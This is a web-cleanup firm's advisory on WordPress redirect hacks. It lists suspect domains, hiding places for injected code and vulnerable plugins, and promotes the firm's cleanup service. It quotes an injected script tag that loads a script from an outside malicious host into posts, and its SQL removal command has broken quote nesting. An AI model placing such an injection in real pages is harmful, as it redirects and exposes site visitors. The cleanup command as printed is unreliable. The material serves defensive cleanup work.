WordPress hack redirect - collectfasttracks.com, bullgoesdown.com

WordPress hacked redirectIn many current WordPress hacks, the symptom occurs that visits to the website are redirected to a foreign domain. This is referred to as "malware redirects" or "spam redirects".
This article explains how this redirect happens and which variations are possible. The redirects do not always occur regularly, which means this type of hack can remain undetected for a long time.
One thing is clear: urgent action is needed so that no valuable traffic is lost.

If you do not want to waste any time, do not hesitate to contact us.

English flagWe speak English! If you need assistance cleaning your hacked site, feel free to contact us via chat or This email address is being protected from spambots. You need JavaScript enabled to view it..

Domains involved in WordPress hacks

Above all, stat.trackstatisticsss.com, dest.collectfasttracks.com, gotosecond2.com and forwardmytraffic.com are currently mainly involved as injected script sources or redirect targets. The content behind them is varied - from simple spam pages and XXX offers to contest redirects.
Very common: You have made the billionth Google search - a common symptom of a WordPress hack.

A continuously updated list of domains that indicate a hack (as of May 2020):

  • stat.trackstatisticsss.com
  • ws.stivenfernando.com
  • dest.collectfasttracks.com
  • gotosecond2.com
  • makesomethird3.com
  • wiilberedmodels.com
  • bullgoesdown.com
  • forwardmytraffic.com
  • dns.createrelativechanging.com
  • greatinstagrampage.com
  • gabriellalovecats.com
  • jackielovedogs.com
  • tomorrowwillbehotmaybe.com
  • activeandbanflip.com
  • developsincelock.com
  • blueeyeswebsite.com

WordPress spam redirects - possible hiding places

Automatic redirects can in principle be placed in any file loaded by the WordPress system - both internal and external.
In addition, script injections directly into the database are also common.
There are various possible hiding places for spam redirects:

  • JavaScript injections in PHP files
    • In particular, the themes' functions.php files
  • Modified JS files
  • Modified site-url / home-url (database)
  • Script injections in pages and posts (database)
  • Script injections in widgets (database)
  • @include of a hidden malicious favicon.ico file in index.phps (or wp-config.php)
  • Injected plugins
  • Modified .htaccess files
  • Embedded ad networks (hacked ad servers)

Clean the wp_content table via phpMyAdmin

A typical injection that can be found in all WordPress posts, for example, would be:

<script src="https://jackielovedogs.com/pret.js?l=1&" language="javascript" type="text/javascript"></script>

You can remove the script with the following SQL command:

UPDATE `wp_posts` SET post_content=REPLACE(post_content,"<script src="https://jackielovedogs.com/pret.js?l=1&" language="javascript" type="text/javascript"></script>","");

The database table prefix wp_ may need to be replaced with your individual prefix.

Investigating the cause of the hack - closing WordPress security vulnerabilities

The main cause of hacked websites is outdated software versions. WordPress itself as well as all plugins and the theme must be updated regularly.
In the current Malicious Redirect campaign, the following plugins are being attacked and are vulnerable in older versions:

  • Duplicator
  • Advanced Access Manager
  • Bold Page Builder
  • Blog Designer
  • Live Chat with Facebook Messenger
  • Yuzo Related Posts
  • Visual CSS Style Editor
  • WP Live Chat Support
  • Form Lightbox
  • Hybrid Composer
  • Woocommerce User Email Verification
  • Yellow Pencil Visual Theme Customizer
  • Coming Soon and Maintenance Mode
  • All NicDark plugins

Successfully attacked plugins are identified by our Access Log Analysis Tool, which you are welcome to use for further investigation of the attack. A certain level of technical understanding is required. If needed, we can take care of the WordPress hack cleanup for you at a favorable fixed price.

Details
Last Updated: 04 May 2020

Additional offers

Customers about us

„The conversion of our Joomla website from PHP 5.3 to PHP 7 was super fast, affordable, and with impeccable results. Very good and friendly communication.“
– H. Bergmann

„Within one day, everything was done extremely professionally and extremely quickly. Very trustworthy. Excellent. 5 stars“
– Fernando V.

„I was unable to help myself, but here I found the expertise needed to get everything cleaned up again. Necessary updates and backups were carried out, everything was extremely affordable, fast, and good!“
– Klaus-Peter

„The site looks great – everything as before – and on PHP 7.2 – I am impressed - many heartfelt thanks!“
– Dr. Ingo Wuddel

„Since we run an online shop, it was very important to us that our site was quickly available again with full functionality for our customers. All work is carried out extremely quickly to our complete satisfaction.“ – Loewen Handels GmbH

„Very fast, reliable, and effective handling of the problem. In addition, I was given tips and Strato-specific information to reduce the risk of the problem recurring.“
– Heino B.

„The contact was exceptionally friendly, and some cosmetic additional work was taken care of on its own - as if it were completely natural. I am relieved and very grateful.“
– R. Mayer

„Great. In an absolute emergency, after 2 domains were blocked by Strato due to a hacker attack, both domains were initially temporarily back online the same day.“
– I. Radchenko

„Excellent service. Problem solved within 18 hours. We are delighted. Thank you very much 🙏“
– Tien Sy Vuong

Website-Bereinigung.de support service
5,0 205 Reviews > 5
Google Reviews

Contact options

This email address is being protected from spambots. You need JavaScript enabled to view it.
Contact form

Schedule a call
+49 (0)2406 969796
Mon. - Fri. | 9 am - 9 pm